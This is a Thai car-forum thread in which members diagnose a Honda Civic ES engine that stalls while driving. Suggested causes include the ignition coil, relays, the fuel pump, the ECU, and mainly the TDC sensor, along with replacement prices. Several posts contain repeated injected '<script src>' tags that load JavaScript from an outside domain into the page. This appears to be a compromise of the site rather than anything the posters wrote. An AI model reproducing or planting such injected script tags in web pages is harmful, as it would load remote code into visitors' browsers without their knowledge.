ศุกร์, 14 มิถุนา 2013 00:58 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
จริงๆแล้วปัญหาก้เกิดเพราะฟันเหยินเองนั่นแหละ








ก็มันรถของฟันเหยินหงะ



พี่อะไหร่เก่า หาโช็คนุ่มๆให้ผมเลย หน้าหลัง ข้อหาจิกฟันเหยิน กันชนท้าย 01 ด้วย ไม่เกิน 5000นะ 5555
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 14 มิถุนา 2013 07:56 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ฟันเหยิน พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
จริงๆแล้วปัญหาก้เกิดเพราะฟันเหยินเองนั่นแหละ








ก็มันรถของฟันเหยินหงะ



พี่อะไหร่เก่า หาโช็คนุ่มๆให้ผมเลย หน้าหลัง ข้อหาจิกฟันเหยิน กันชนท้าย 01 ด้วย ไม่เกิน 5000นะ 5555


บังคับ ขู่เข็น ขูดรีด 
srithanon พิมพ์ว่า:
สิ่งที่จะทำให้เกิดอาการนี้ได้ หลักๆแล้วจะมีด้วยกันตามนี้  
จุดแรก    ที่ชุดวงจรช่วยจุดระเบิด  ที่มีตัว Ignition coil  สร้างไฟสูง  เวลาที่ตัวมันร้อนจเกิดการชอร์ทเทิน   ไม่มีไฟสูงจ่ายให้กับหัวเทียน
จุดที่สอง  ที่ตัว Main Relay อาจจะชอร์เทินของขดลวดแม็คเนติค   พอร้อนมันก็ไม่มีไฟจ่ายให้กับระบบเครื่องยนต์
จุดที่สาม   ที่ตัว Relay เปิดวงจร  จะำทำงานทันที่ ที่เปิดสวิชท์ ON  เพื่อเอาไฟไปจ่ายให้ตัวปั้มติ๊ก  แต่เมื่อเครื่องยนต์ติด  จะถูกคอนโทรล
              โดย ECU  ให้ตัวรีเรย์นี้ทำงานต่อไฟจนกว่าเครื่องยนต์จะดับ  เป้นไปได้ว่า  กล่อง ECU  ไม่ต่อระบบกราวด์ให้ตัว รีเรย์เปิดวงจร จุดที่สี่   เป็นไปได้ว่า ที่ตัวปั้มติ๊กน้ำมันอาจจะเสีย
จุดที่ห้า  ที่ตัว TDC sensor  อาจจะเสีย   แต่อาการที่ตัว TDC มันเสีย   เวลาที่เครื่องยนต์ดับ   จะสตาร์ทไม่ติดทันที่  ต้องรอให้เครื่อง
           เย็นลงก่อนถึงจะสตาร์ทเครื่องยนต์ติด  แต่ควรจะตรวจเช็คทันที่ ที่เครื่องยนต์ดับ  ให้ใช้มิเตอรืวัดค่าความต้านทาน  หากวัดค่า
          ความต้านทานขึ้น   แสดงว่าปกติ  หากวัดไม่ขึ้น เสีย  ต้องรอให้ตัวมันเย็นถึงจะวัดมีค่าความต้านทาน
และประการที่หก       บางครั้งเป็นไปได้ว่าที่กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิดไปให้วงจรช่วยจุดระเบิดเทำงานสร้างไฟสูงให้กับหัว
           หัวเทียน   เท่าที่เคยตรวจแก้ไข  พบว่าที่แผ่นเมนบอร์ดในกล่อง ECU  มีตัว Capacitor ที่เป็นแบบอีเลคโตรไลท์  มันบวมทำให้
           เกิดค่าความต้านขึ้นภายในตัวของมัน  ทำให้มีกระแสไฟไหลผ่านค่าความต้านทานที่เกิดขึ้นนี้ลงกราวด์  มันก็ไม่มีไฟในวงจร
          ขยายสัญญาณ IGT ซึ่งเป็นสัญญาณการจุดระบิด ไปให้วงจรช่วยจุดรเบิดทำงานสร้างไฟสูงให้กับหัวเทียน   จากที่เคยตรวจแก้ไข
         ก็เคบพบปัญหา้กิดที่ส่วนนี้เหมือนกัน


จากจุดต่างๆที่กล่าวมานี้  มันสามารถที่จะก่อให้เกิดอาการที่เครื่องยนต์ดับทันทีในขณะที่ขับรถอยู่    แต่ก็ยังมีส่วนอื่นที่เกี่ยวข้องที่ทำให้เกิดอาการนี้ได้เช่นกัน   ดังนั้นการตรวจสอบแก้ไขปัญหาที่เกิดขึ้นนี้   จำเป้นที่จะต้องใช้เครื่องมือทางอีเลคโทรนิคส์เข้ามาช่วยวิเคราะห์ปัญหาที่เกิดขึ้น  เช่น Digital oscilloscope   ซึ่งสามารถเห็นความบกพร่องของระบบการทำงานของเครื่องยนต์ได้ถูกต้องและตรงประเด็น
ทำให้การตรวจแก้ไขใช้เวลาไม่มาก  ก็แก้ไขปัญหาที่เกิดขึ้นนี้ได้............srithanon



       


สามารถตรวจสอบที่ไหนได้บ้างครับ อยากลองเช็คดู


 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
apssdemo


ชื่อเล่น: บัก บอล

เข้าร่วม: 21 ตุลา 2010
ตอบ: 462

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 658
ให้คำขอบคุณ: 348

ที่อยู่: ระยอง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 14 มิถุนา 2013 08:15 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
TDC "<script src="https://sport32news.com/civicesgroup.js"> เอ๊ะหรือว่าเป็นเพราะฟันเหยิน




ปัญหายอดฮิต ของD17 ครับ เปลี่ยนเลยครับ จะได้ไม่เป็นภาระ ของเพื่อนฝูง.......วิ่งได้อีก2แสนโล มาเปลียนอีกที"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 14 มิถุนา 2013 08:39 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ดับๆ ติด น่าจะ TDC ประมาณพันสี่ครับ เบิกศูนย์
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
apssdemo


ชื่อเล่น: บัก บอล

เข้าร่วม: 21 ตุลา 2010
ตอบ: 462

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 658
ให้คำขอบคุณ: 348

ที่อยู่: ระยอง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 14 มิถุนา 2013 10:07 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
akkarin_c พิมพ์ว่า:
ดับๆ ติด น่าจะ TDC ประมาณพันสี่ครับ เบิกศูนย์




เปลี่ยนเอง หรือ ให้0เปลี่ยน ครับ แพงจัง ........ของผมเปลี่ยนเอง 1387 เบิก0 ครับ 
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 14 มิถุนา 2013 12:22 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
ค่าอ่ะไหล่ครับ เปลี่ยนข้างนอก จำไม่ได่ว่าเท่าไหร่ ทำหลายอย่าง

ปล. พันสี่ กับ 1387 มันก็เท่าๆกันนี่ครับ แพงยังไง???
ฟันเหยิน


เข้าร่วม: 11 มิถุนา 2013
ตอบ: 12

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 0
เสาร์, 15 มิถุนา 2013 00:18 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
akkarin_c พิมพ์ว่า:
ค่าอ่ะไหล่ครับ เปลี่ยนข้างนอก จำไม่ได่ว่าเท่าไหร่ ทำหลายอย่าง

ปล. พันสี่ กับ 1387 มันก็เท่าๆกันนี่ครับ แพงยังไง???




ขอบคุณครับผม
javascript:emoticon(' ','images/smiles/emo_onion_cry.gif')
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 15 มิถุนา 2013 01:10 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
จะให้ดีมันมี2ตัวนะ เปลี่ยนไปด้วยเลย ตัวบนtdc ตัวถัดลงมาอีกตัวอยู่ด้านล่างชื่อะไรจำไม่ได้ อันนี้เสียก็ดับอาการเดียวกับtdc เปลี่ยนไปเลยอาการนี้หายแน่นอนสบายใจใช้ต่อได้อีกแสนโล
ได้รับคำขอบคุณจาก: thammarong007 
thammarong007


ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

ที่อยู่: ซ.มังกร เทพารักษ์ สมุทรปราการ
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 15 มิถุนา 2013 01:37 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
Sensor แถวๆสายพาน Timing มันมีอยู่ 2 ตัว ทำหน้าที่วัดจุดศูนย์ตายบน กับ ล่าง ถ้าเปลี่ยนแนะนำทีเดียว 2 ตัวเลยครับ จบสวยแน่นอนครับ
apssdemo


ชื่อเล่น: บัก บอล

เข้าร่วม: 21 ตุลา 2010
ตอบ: 462

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 658
ให้คำขอบคุณ: 348

ที่อยู่: ระยอง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 15 มิถุนา 2013 02:05 - เจอปัญหา เครื่องดับกระทันหันครับ ขับดีๆเครื่องวืดไปเลย
akkarin_c พิมพ์ว่า:
ค่าอ่ะไหล่ครับ เปลี่ยนข้างนอก จำไม่ได่ว่าเท่าไหร่ ทำหลายอย่าง

ปล. พันสี่ กับ 1387 มันก็เท่าๆกันนี่ครับ แพงยังไง???




โทดที ครับ อ่านกลับเลย ตายๆๆเริ่มแก่ ละ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...